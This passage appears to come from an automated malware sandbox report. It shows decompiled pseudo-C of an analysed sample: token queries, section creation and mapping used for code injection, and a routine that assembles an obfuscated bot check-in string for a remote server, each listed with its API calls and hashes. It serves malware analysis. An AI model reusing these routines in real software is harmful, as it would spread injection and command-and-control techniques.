                                                                                                                                                                                                    						NtClose(_v8); // executed
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					NtClose(_v12);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t48;
                                                                                                                                                                                                    			}



















                                                                                                                                                                                                    0x04f6993f
                                                                                                                                                                                                    0x04f69940
                                                                                                                                                                                                    0x04f69941
                                                                                                                                                                                                    0x04f69942
                                                                                                                                                                                                    0x04f69943
                                                                                                                                                                                                    0x04f69947
                                                                                                                                                                                                    0x04f6994e
                                                                                                                                                                                                    0x04f6995d
                                                                                                                                                                                                    0x04f69960
                                                                                                                                                                                                    0x04f69963
                                                                                                                                                                                                    0x04f6996a
                                                                                                                                                                                                    0x04f6996d
                                                                                                                                                                                                    0x04f69970
                                                                                                                                                                                                    0x04f69973
                                                                                                                                                                                                    0x04f69976
                                                                                                                                                                                                    0x04f69981
                                                                                                                                                                                                    0x04f69983
                                                                                                                                                                                                    0x04f6998c
                                                                                                                                                                                                    0x04f69994
                                                                                                                                                                                                    0x04f69996
                                                                                                                                                                                                    0x04f699a8
                                                                                                                                                                                                    0x04f699b2
                                                                                                                                                                                                    0x04f699b6
                                                                                                                                                                                                    0x04f699c5
                                                                                                                                                                                                    0x04f699c9
                                                                                                                                                                                                    0x04f699d2
                                                                                                                                                                                                    0x04f699da
                                                                                                                                                                                                    0x04f699da
                                                                                                                                                                                                    0x04f699dc
                                                                                                                                                                                                    0x04f699dc
                                                                                                                                                                                                    0x04f699e4
                                                                                                                                                                                                    0x04f699ea
                                                                                                                                                                                                    0x04f699ee
                                                                                                                                                                                                    0x04f699ee
                                                                                                                                                                                                    0x04f699f9

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04F69979
                                                                                                                                                                                                    • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04F6998C
                                                                                                                                                                                                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04F699A8
                                                                                                                                                                                                      • Part of subcall function 04F68D59: RtlAllocateHeap.NTDLL(00000000,00000000,04F69099), ref: 04F68D65
                                                                                                                                                                                                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04F699C5
                                                                                                                                                                                                    • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04F699D2
                                                                                                                                                                                                    • NtClose.NTDLL(?), ref: 04F699E4
                                                                                                                                                                                                    • NtClose.NTDLL(00000000), ref: 04F699EE
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2575439697-0
                                                                                                                                                                                                    • Opcode ID: 79143090df785f1a5644ef0323b433e4bbc91d2acfb7a3551f7cd0139f7f6fe7
                                                                                                                                                                                                    • Instruction ID: 0303ffc6674208210a3e558e095b97862679263144b693734eb8106023ae2ec9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79143090df785f1a5644ef0323b433e4bbc91d2acfb7a3551f7cd0139f7f6fe7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B421E5B2A0021CFBDB01AF95DC85EDEBFBDEF58740F104026FA45A6110D7B19A459FA0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                    			E00401DD0(intOrPtr* __eax, void** _a4) {
                                                                                                                                                                                                    				int _v12;
                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                    				int _v28;
                                                                                                                                                                                                    				int _v32;
                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                    				int _v40;
                                                                                                                                                                                                    				int _v44;
                                                                                                                                                                                                    				void* _v48;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				long _t34;
                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                    				void* _t47;
                                                                                                                                                                                                    				intOrPtr* _t48;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t48 = __eax;
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				_v24 =  *((intOrPtr*)(__eax + 4));
                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                    				_v48 = 0x18;
                                                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                                                    				_v36 = 0x40;
                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                                    				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                                                                                                                                                                    				if(_t34 < 0) {
                                                                                                                                                                                                    					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					 *_t48 = _v16;
                                                                                                                                                                                                    					_t39 = E00401812(_t48,  &_v12); // executed
                                                                                                                                                                                                    					_t47 = _t39;
                                                                                                                                                                                                    					if(_t47 != 0) {
                                                                                                                                                                                                    						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						memset(_v12, 0, _v24);
                                                                                                                                                                                                    						 *_a4 = _v12;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t47;
                                                                                                                                                                                                    			}


















                                                                                                                                                                                                    0x00401dd9
                                                                                                                                                                                                    0x00401de0
                                                                                                                                                                                                    0x00401de1
                                                                                                                                                                                                    0x00401de2
                                                                                                                                                                                                    0x00401de3
                                                                                                                                                                                                    0x00401de4
                                                                                                                                                                                                    0x00401df5
                                                                                                                                                                                                    0x00401df9
                                                                                                                                                                                                    0x00401e0d
                                                                                                                                                                                                    0x00401e10
                                                                                                                                                                                                    0x00401e13
                                                                                                                                                                                                    0x00401e1a
                                                                                                                                                                                                    0x00401e1d
                                                                                                                                                                                                    0x00401e24
                                                                                                                                                                                                    0x00401e27
                                                                                                                                                                                                    0x00401e2a
                                                                                                                                                                                                    0x00401e2d
                                                                                                                                                                                                    0x00401e32
                                                                                                                                                                                                    0x00401e6d
                                                                                                                                                                                                    0x00401e34
                                                                                                                                                                                                    0x00401e37
                                                                                                                                                                                                    0x00401e3d
                                                                                                                                                                                                    0x00401e42
                                                                                                                                                                                                    0x00401e46
                                                                                                                                                                                                    0x00401e64
                                                                                                                                                                                                    0x00401e48
                                                                                                                                                                                                    0x00401e4f
                                                                                                                                                                                                    0x00401e5d
                                                                                                                                                                                                    0x00401e5d
                                                                                                                                                                                                    0x00401e46
                                                                                                                                                                                                    0x00401e75

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 00401E2D
                                                                                                                                                                                                      • Part of subcall function 00401812: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401E42,00000002,00000000,?,?,00000000,?,?,00401E42,00000002), ref: 0040183F
                                                                                                                                                                                                    • memset.NTDLL ref: 00401E4F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.622657691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.622723835.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Section$CreateViewmemset
                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                    • API String ID: 2533685722-2766056989
                                                                                                                                                                                                    • Opcode ID: 6a036c25c3596289e1496aeb05bd05d7099d0fc69dd2c6ace39beb277248278c
                                                                                                                                                                                                    • Instruction ID: 682982a12bd6033cef59e89161f8f857da061b666d8ad3cf4dddb6ebc402c103
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a036c25c3596289e1496aeb05bd05d7099d0fc69dd2c6ace39beb277248278c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31210BB2D00209AFCB11DFA9C8849DFFBB9EB48354F50843AE605F7250D7349A458BA4
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                    			E00401812(void** __esi, PVOID* _a4) {
                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                    				long _t13;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                    				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                                                                                                                                                                    				if(_t13 < 0) {
                                                                                                                                                                                                    					_push(_t13);
                                                                                                                                                                                                    					return __esi[6]();
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}







                                                                                                                                                                                                    0x00401824
                                                                                                                                                                                                    0x0040182a
                                                                                                                                                                                                    0x00401838
                                                                                                                                                                                                    0x0040183f
                                                                                                                                                                                                    0x00401844
                                                                                                                                                                                                    0x0040184a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040184b
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401E42,00000002,00000000,?,?,00000000,?,?,00401E42,00000002), ref: 0040183F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.622657691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.622723835.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: SectionView
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1323581903-0
                                                                                                                                                                                                    • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                    • Instruction ID: f1e4a7082d62b98b24a347d6428e7a37a76fa0b9185e8efd2efb81274d15c36a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DF037B690020CFFDB119FA5CC85C9FBBBDEB44354B10893AF152E10A0D6349E089B60
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                    			E04F612C4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				long _t60;
                                                                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                                                                    				intOrPtr _t62;
                                                                                                                                                                                                    				intOrPtr _t63;
                                                                                                                                                                                                    				intOrPtr _t64;
                                                                                                                                                                                                    				intOrPtr _t65;
                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                    				intOrPtr _t69;
                                                                                                                                                                                                    				int _t72;
                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                    				void* _t74;
                                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                                    				void* _t79;
                                                                                                                                                                                                    				intOrPtr _t83;
                                                                                                                                                                                                    				intOrPtr _t87;
                                                                                                                                                                                                    				intOrPtr* _t89;
                                                                                                                                                                                                    				intOrPtr _t95;
                                                                                                                                                                                                    				void* _t97;
                                                                                                                                                                                                    				intOrPtr _t104;
                                                                                                                                                                                                    				signed int _t108;
                                                                                                                                                                                                    				char** _t110;
                                                                                                                                                                                                    				int _t113;
                                                                                                                                                                                                    				signed int _t115;
                                                                                                                                                                                                    				intOrPtr* _t116;
                                                                                                                                                                                                    				intOrPtr* _t118;
                                                                                                                                                                                                    				intOrPtr* _t120;
                                                                                                                                                                                                    				intOrPtr* _t122;
                                                                                                                                                                                                    				intOrPtr _t125;
                                                                                                                                                                                                    				intOrPtr _t130;
                                                                                                                                                                                                    				int _t134;
                                                                                                                                                                                                    				CHAR* _t136;
                                                                                                                                                                                                    				intOrPtr _t137;
                                                                                                                                                                                                    				void* _t138;
                                                                                                                                                                                                    				void* _t147;
                                                                                                                                                                                                    				int _t148;
                                                                                                                                                                                                    				void* _t149;
                                                                                                                                                                                                    				intOrPtr _t150;
                                                                                                                                                                                                    				void* _t152;
                                                                                                                                                                                                    				long _t156;
                                                                                                                                                                                                    				intOrPtr* _t157;
                                                                                                                                                                                                    				intOrPtr* _t158;
                                                                                                                                                                                                    				intOrPtr* _t161;
                                                                                                                                                                                                    				void* _t162;
                                                                                                                                                                                                    				void* _t164;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t147 = __edx;
                                                                                                                                                                                                    				_t138 = __ecx;
                                                                                                                                                                                                    				_t60 = __eax;
                                                                                                                                                                                                    				_v12 = 8;
                                                                                                                                                                                                    				if(__eax == 0) {
                                                                                                                                                                                                    					_t60 = GetTickCount();
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t61 =  *0x4f6d018; // 0x1b60b74c
                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                    				_t62 =  *0x4f6d014; // 0x3a87c8cd
                                                                                                                                                                                                    				_t136 = _a16;
                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                    				_t63 =  *0x4f6d010; // 0xd8d2f808
                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                    				_t64 =  *0x4f6d00c; // 0x8f8f86c2
                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                    				_t65 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    				_t3 = _t65 + 0x4f6e633; // 0x74666f73
                                                                                                                                                                                                    				_t148 = wsprintfA(_t136, _t3, 3, 0x3d13b, _t64, _t63, _t62, _t61,  *0x4f6d02c,  *0x4f6d004, _t60);
                                                                                                                                                                                                    				_t68 = E04F66B47();
                                                                                                                                                                                                    				_t69 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    				_t4 = _t69 + 0x4f6e673; // 0x74707526
                                                                                                                                                                                                    				_t72 = wsprintfA(_t148 + _t136, _t4, _t68);
                                                                                                                                                                                                    				_t164 = _t162 + 0x38;
                                                                                                                                                                                                    				_t149 = _t148 + _t72; // executed
                                                                                                                                                                                                    				_t73 = E04F66111(_t138); // executed
                                                                                                                                                                                                    				_t137 = __imp__;
                                                                                                                                                                                                    				_v8 = _t73;
                                                                                                                                                                                                    				if(_t73 != 0) {
                                                                                                                                                                                                    					_t130 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    					_t7 = _t130 + 0x4f6e8eb; // 0x736e6426
                                                                                                                                                                                                    					_t134 = wsprintfA(_a16 + _t149, _t7, _t73);
                                                                                                                                                                                                    					_t164 = _t164 + 0xc;
                                                                                                                                                                                                    					_t149 = _t149 + _t134;
                                                                                                                                                                                                    					HeapFree( *0x4f6d238, 0, _v8);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t74 = E04F626A0();
                                                                                                                                                                                                    				_v8 = _t74;
                                                                                                                                                                                                    				if(_t74 != 0) {
                                                                                                                                                                                                    					_t125 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    					_t11 = _t125 + 0x4f6e8f3; // 0x6f687726
                                                                                                                                                                                                    					wsprintfA(_t149 + _a16, _t11, _t74);
                                                                                                                                                                                                    					_t164 = _t164 + 0xc;
                                                                                                                                                                                                    					HeapFree( *0x4f6d238, 0, _v8);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t150 =  *0x4f6d324; // 0x59295b0
                                                                                                                                                                                                    				_t76 = E04F61B77(0x4f6d00a, _t150 + 4);
                                                                                                                                                                                                    				_t156 = 0;
                                                                                                                                                                                                    				_v20 = _t76;
                                                                                                                                                                                                    				if(_t76 == 0) {
                                                                                                                                                                                                    					L26:
                                                                                                                                                                                                    					RtlFreeHeap( *0x4f6d238, _t156, _a16); // executed
                                                                                                                                                                                                    					return _v12;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t79 = RtlAllocateHeap( *0x4f6d238, 0, 0x800);
                                                                                                                                                                                                    					_v8 = _t79;
                                                                                                                                                                                                    					if(_t79 == 0) {
                                                                                                                                                                                                    						L25:
                                                                                                                                                                                                    						HeapFree( *0x4f6d238, _t156, _v20);
                                                                                                                                                                                                    						goto L26;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					E04F61BE3(GetTickCount());
                                                                                                                                                                                                    					_t83 =  *0x4f6d324; // 0x59295b0
                                                                                                                                                                                                    					__imp__(_t83 + 0x40);
                                                                                                                                                                                                    					asm("lock xadd [eax], ecx");
                                                                                                                                                                                                    					_t87 =  *0x4f6d324; // 0x59295b0
                                                                                                                                                                                                    					__imp__(_t87 + 0x40);
                                                                                                                                                                                                    					_t89 =  *0x4f6d324; // 0x59295b0
                                                                                                                                                                                                    					_t152 = E04F61A30(1, _t147, _a16,  *_t89);
                                                                                                                                                                                                    					_v28 = _t152;
                                                                                                                                                                                                    					asm("lock xadd [eax], ecx");
                                                                                                                                                                                                    					if(_t152 == 0) {
                                                                                                                                                                                                    						L24:
                                                                                                                                                                                                    						RtlFreeHeap( *0x4f6d238, _t156, _v8); // executed
                                                                                                                                                                                                    						goto L25;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					StrTrimA(_t152, 0x4f6c2a4);
                                                                                                                                                                                                    					_t95 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    					_push(_t152);
                                                                                                                                                                                                    					_t18 = _t95 + 0x4f6e252; // 0x616d692f
                                                                                                                                                                                                    					_t97 = E04F62773(_t18);
                                                                                                                                                                                                    					_v16 = _t97;
                                                                                                                                                                                                    					if(_t97 == 0) {
                                                                                                                                                                                                    						L23:
                                                                                                                                                                                                    						RtlFreeHeap( *0x4f6d238, _t156, _t152); // executed
                                                                                                                                                                                                    						goto L24;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t157 = __imp__;
                                                                                                                                                                                                    					 *_t157(_t152, _a4);
                                                                                                                                                                                                    					 *_t157(_v8, _v20);
                                                                                                                                                                                                    					_t158 = __imp__;
                                                                                                                                                                                                    					 *_t158(_v8, _v16);
                                                                                                                                                                                                    					 *_t158(_v8, _t152);
                                                                                                                                                                                                    					_t104 = E04F6978C(0, _v8);
                                                                                                                                                                                                    					_a4 = _t104;
                                                                                                                                                                                                    					if(_t104 == 0) {
                                                                                                                                                                                                    						_v12 = 8;
                                                                                                                                                                                                    						L21:
                                                                                                                                                                                                    						E04F65BEA();
                                                                                                                                                                                                    						L22:
                                                                                                                                                                                                    						HeapFree( *0x4f6d238, 0, _v16);
                                                                                                                                                                                                    						_t156 = 0;
                                                                                                                                                                                                    						goto L23;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t108 = E04F6A523(_t137, 0xffffffffffffffff, _t152,  &_v24); // executed
                                                                                                                                                                                                    					_v12 = _t108;
                                                                                                                                                                                                    					if(_t108 == 0) {
                                                                                                                                                                                                    						_t161 = _v24;
                                                                                                                                                                                                    						_t115 = E04F69561(_t161, _a4, _a8, _a12); // executed
                                                                                                                                                                                                    						_v12 = _t115;
                                                                                                                                                                                                    						_t116 =  *((intOrPtr*)(_t161 + 8));
                                                                                                                                                                                                    						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
                                                                                                                                                                                                    						_t118 =  *((intOrPtr*)(_t161 + 8));
                                                                                                                                                                                                    						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                                                                                                                                                                                    						_t120 =  *((intOrPtr*)(_t161 + 4));
                                                                                                                                                                                                    						 *((intOrPtr*)( *_t120 + 8))(_t120);
                                                                                                                                                                                                    						_t122 =  *_t161;
                                                                                                                                                                                                    						 *((intOrPtr*)( *_t122 + 8))(_t122);
                                                                                                                                                                                                    						E04F6677C(_t161);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_v12 != 0x10d2) {
                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                    						if(_v12 == 0) {
                                                                                                                                                                                                    							_t110 = _a8;
                                                                                                                                                                                                    							if(_t110 != 0) {
                                                                                                                                                                                                    								_t153 =  *_t110;
                                                                                                                                                                                                    								_t159 =  *_a12;
                                                                                                                                                                                                    								wcstombs( *_t110,  *_t110,  *_a12);
                                                                                                                                                                                                    								_t113 = E04F66221(_t153, _t153, _t159 >> 1);
                                                                                                                                                                                                    								_t152 = _v28;
                                                                                                                                                                                                    								 *_a12 = _t113;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L19;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if(_a8 != 0) {
                                                                                                                                                                                                    							L19:
                                                                                                                                                                                                    							E04F6677C(_a4);
                                                                                                                                                                                                    							if(_v12 == 0 || _v12 == 0x10d2) {
                                                                                                                                                                                                    								goto L22;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								goto L21;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}























































                                                                                                                                                                                                    0x04f612c4
                                                                                                                                                                                                    0x04f612c4
                                                                                                                                                                                                    0x04f612c4
                                                                                                                                                                                                    0x04f612cd
                                                                                                                                                                                                    0x04f612d6
                                                                                                                                                                                                    0x04f612d8
                                                                                                                                                                                                    0x04f612d8
                                                                                                                                                                                                    0x04f612e5
                                                                                                                                                                                                    0x04f612f0
                                                                                                                                                                                                    0x04f612f3
                                                                                                                                                                                                    0x04f612f8
                                                                                                                                                                                                    0x04f61301
                                                                                                                                                                                                    0x04f61304
                                                                                                                                                                                                    0x04f61309
                                                                                                                                                                                                    0x04f6130c
                                                                                                                                                                                                    0x04f61311
                                                                                                                                                                                                    0x04f61314
                                                                                                                                                                                                    0x04f61320
                                                                                                                                                                                                    0x04f6132d
                                                                                                                                                                                                    0x04f6132f
                                                                                                                                                                                                    0x04f61335
                                                                                                                                                                                                    0x04f6133a
                                                                                                                                                                                                    0x04f61345
                                                                                                                                                                                                    0x04f61347
                                                                                                                                                                                                    0x04f6134a
                                                                                                                                                                                                    0x04f6134c
                                                                                                                                                                                                    0x04f61351
                                                                                                                                                                                                    0x04f61357
                                                                                                                                                                                                    0x04f6135c
                                                                                                                                                                                                    0x04f6135f
                                                                                                                                                                                                    0x04f61364
                                                                                                                                                                                                    0x04f61371
                                                                                                                                                                                                    0x04f61373
                                                                                                                                                                                                    0x04f61379
                                                                                                                                                                                                    0x04f61383
                                                                                                                                                                                                    0x04f61383
                                                                                                                                                                                                    0x04f61385
                                                                                                                                                                                                    0x04f6138a
                                                                                                                                                                                                    0x04f6138f
                                                                                                                                                                                                    0x04f61392
                                                                                                                                                                                                    0x04f61397
                                                                                                                                                                                                    0x04f613a4
                                                                                                                                                                                                    0x04f613a6
                                                                                                                                                                                                    0x04f613b4
                                                                                                                                                                                                    0x04f613b4
                                                                                                                                                                                                    0x04f613b6
                                                                                                                                                                                                    0x04f613c4
                                                                                                                                                                                                    0x04f613c9
                                                                                                                                                                                                    0x04f613cb
                                                                                                                                                                                                    0x04f613d0
                                                                                                                                                                                                    0x04f6159f
                                                                                                                                                                                                    0x04f615a9
                                                                                                                                                                                                    0x04f615b2
                                                                                                                                                                                                    0x04f613d6
                                                                                                                                                                                                    0x04f613e2
                                                                                                                                                                                                    0x04f613e8
                                                                                                                                                                                                    0x04f613ed
                                                                                                                                                                                                    0x04f61593
                                                                                                                                                                                                    0x04f6159d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6159d
                                                                                                                                                                                                    0x04f613f9
                                                                                                                                                                                                    0x04f613fe
                                                                                                                                                                                                    0x04f61407
                                                                                                                                                                                                    0x04f61418
                                                                                                                                                                                                    0x04f6141c
                                                                                                                                                                                                    0x04f61425
                                                                                                                                                                                                    0x04f6142b
                                                                                                                                                                                                    0x04f6143a
                                                                                                                                                                                                    0x04f61441
                                                                                                                                                                                                    0x04f6144a
                                                                                                                                                                                                    0x04f61450
                                                                                                                                                                                                    0x04f61587
                                                                                                                                                                                                    0x04f61591
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f61591
                                                                                                                                                                                                    0x04f6145c
                                                                                                                                                                                                    0x04f61462
                                                                                                                                                                                                    0x04f61467
                                                                                                                                                                                                    0x04f61468
                                                                                                                                                                                                    0x04f6146f
                                                                                                                                                                                                    0x04f61474
                                                                                                                                                                                                    0x04f61479
                                                                                                                                                                                                    0x04f6157d
                                                                                                                                                                                                    0x04f61585
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f61585
                                                                                                                                                                                                    0x04f61482
                                                                                                                                                                                                    0x04f61489
                                                                                                                                                                                                    0x04f61491
                                                                                                                                                                                                    0x04f61496
                                                                                                                                                                                                    0x04f6149f
                                                                                                                                                                                                    0x04f614a5
                                                                                                                                                                                                    0x04f614ac
                                                                                                                                                                                                    0x04f614b1
                                                                                                                                                                                                    0x04f614b6
                                                                                                                                                                                                    0x04f615b5
                                                                                                                                                                                                    0x04f61569
                                                                                                                                                                                                    0x04f61569
                                                                                                                                                                                                    0x04f6156e
                                                                                                                                                                                                    0x04f61579
                                                                                                                                                                                                    0x04f6157b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6157b
                                                                                                                                                                                                    0x04f614c0
                                                                                                                                                                                                    0x04f614c5
                                                                                                                                                                                                    0x04f614ca
                                                                                                                                                                                                    0x04f614cf
                                                                                                                                                                                                    0x04f614da
                                                                                                                                                                                                    0x04f614df
                                                                                                                                                                                                    0x04f614e2
                                                                                                                                                                                                    0x04f614e8
                                                                                                                                                                                                    0x04f614ee
                                                                                                                                                                                                    0x04f614f4
                                                                                                                                                                                                    0x04f614f7
                                                                                                                                                                                                    0x04f614fd
                                                                                                                                                                                                    0x04f61500
                                                                                                                                                                                                    0x04f61505
                                                                                                                                                                                                    0x04f61509
                                                                                                                                                                                                    0x04f61509
                                                                                                                                                                                                    0x04f61515
                                                                                                                                                                                                    0x04f61521
                                                                                                                                                                                                    0x04f61525
                                                                                                                                                                                                    0x04f61527
                                                                                                                                                                                                    0x04f6152c
                                                                                                                                                                                                    0x04f6152e
                                                                                                                                                                                                    0x04f61533
                                                                                                                                                                                                    0x04f61538
                                                                                                                                                                                                    0x04f61545
                                                                                                                                                                                                    0x04f6154d
                                                                                                                                                                                                    0x04f61550
                                                                                                                                                                                                    0x04f61550
                                                                                                                                                                                                    0x04f6152c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f61517
                                                                                                                                                                                                    0x04f6151b
                                                                                                                                                                                                    0x04f61552
                                                                                                                                                                                                    0x04f61555
                                                                                                                                                                                                    0x04f6155e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6155e
                                                                                                                                                                                                    0x04f6151d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6151d
                                                                                                                                                                                                    0x04f61515

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 04F612D8
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 04F61328
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 04F61345
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 04F61371
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 04F61383
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 04F613A4
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 04F613B4
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04F613E2
